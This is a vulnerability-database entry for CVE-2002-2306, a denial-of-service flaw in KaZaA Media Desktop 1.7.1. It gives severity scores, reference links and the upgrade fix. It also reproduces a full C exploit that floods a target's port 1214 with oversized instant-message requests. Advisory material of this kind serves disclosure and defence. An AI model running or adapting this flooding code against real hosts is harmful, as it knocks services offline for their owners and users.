CVE-2002-2306
CVSS 7.8
Published: 2002-12-31 00:00:00
Last revised: 2008-09-05 16:32:52
NMCOE    

[Original] Sharman Networks KaZaA Media Desktop 1.7.1 allows remote attackers to cause a denial of service (CPU consumption) by sending several large messages.


[CNNVD] KaZaA Media Desktop Large Message Denial of Service Vulnerability (CNNVD-200212-311)

        Sharman Networks KaZaA Media Desktop version 1.7.1 contains a vulnerability. A remote attacker can cause a denial of service (CPU consumption) by sending several large messages.

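- CVSS (Base Score)

CVSS score: 7.8 [Severe (HIGH)]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: COMPLETE [may cause the system to go down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [the attacker does not need internal-network or local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (Weakness Category)

CWE-399 [Resource Management Errors]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links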

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2306
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2306
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-311
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/5317
(PATCH)  BID  5317
http://xforce.iss.net/xforce/xfdb/9672
(UNKNOWN)  XF  kazaa-large-msg-dos(9672)

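- Vulnerability Information

KaZaA Media Desktop Large Message Denial of Service Vulnerability
High risk  Other
2002-12-31 00:00:00 2002-12-31 00:00:00
Remote
        Sharman Networks KaZaA Media Desktop version 1.7.1 contains a vulnerability. A remote attacker can cause a denial of service (CPU consumption) by sending several large messages.

- Advisories and Patches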

        An updated version is available:
        Sharman Networks KaZaA Media Desktop 1.7.1
        

- Vulnerability Information (21653)

KaZaA Media Desktop 1.7.1 Large Message Denial Of Service Vulnerability (EDBID:21653)
windows remote
2002-07-25 Verified
0 Josh and omega
N/A [Click to download]
source: http://www.securityfocus.com/bid/5317/info

KaZaA may consume large amounts of CPU when processing a sequence of large messages. It is possible for an attacker to flood a vulnerable system with a large number of messages, resulting in a denial of service condition.

/*
   kazaa denial of service attack
   by Josh and omega
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdarg.h>

#define PORT 1214


int main(int argc, char *argv[])
{
   int fd, numbytes, randnum, k;
   struct hostent *host;
   struct sockaddr_in them;
   char buf2[4026];
   char buf[5000];
   char *bigboy;
   int i, size, j;


   memset(buf2, 'a', sizeof(buf2));
   buf2[sizeof(buf2)-1]='\0';
   srand(time(NULL));

   if (argc < 5)
   {
      fprintf(stderr,"usage: %s <hostname> <(this*4026) bytes per message> <username_of_target> <number_of_messages>\n", argv[0]);
      exit(1);
   }
   if ((host=gethostbyname(argv[1])) == NULL)
   {
      perror("gethostbyname");
      exit(1);
   }

   them.sin_family = AF_INET;
   them.sin_port = htons(PORT);
   them.sin_addr = *((struct in_addr *)host->h_addr);
   memset(&(them.sin_zero), '\0', 8);


   size=(4042*atoi(argv[2]))+280+1;
   bigboy=(char *)malloc(size);

   snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost: 68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002 18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network: KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection:  open\nX-Kazaa-IMTo: %s@KaZaA\nX-Kazaa-IMType: user_text\n", randnum, randnum, argv[3]);

   /* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */
   snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2);
   for(k=0;k<atoi(argv[2]);k++)
   {
      strcat(bigboy, buf);
      k++;
   }
   strcat(bigboy, "\r\n\r\n\r\n\r\n\r\n");

   fprintf(stdout, "done preparing packet... sending\n");
   for(i=0, k=0;i<atoi(argv[4]);i++)
   {
     if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
       perror("socket");
     }
     else
     {
       if (connect(fd, (struct sockaddr *)&them,sizeof(struct sockaddr)) == -1)
       {
         perror("connect");
       }
       else
       {
         printf("sending %d message\n", k);
         write(fd, bigboy, strlen(bigboy));
         k++;
         close(fd);
       }
     }
   }
   fprintf(stdout, "\n%d out of %d attempted got through\n", k, i);
   free(bigboy);
   return 0;
}		

- Vulnerability Information

59567
KaZaA Media Desktop Message Saturation Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Vendor Verified

- Vulnerability Description

KaZaA Media Desktop contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker sends several large messages causing 100 percent CPU consumption, and will result in loss of availability for the platform.

- Timeline

2002-07-25 Unknown
2002-07-25 Unknown

- Solution

Upgrade to version 1.7.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

 

 
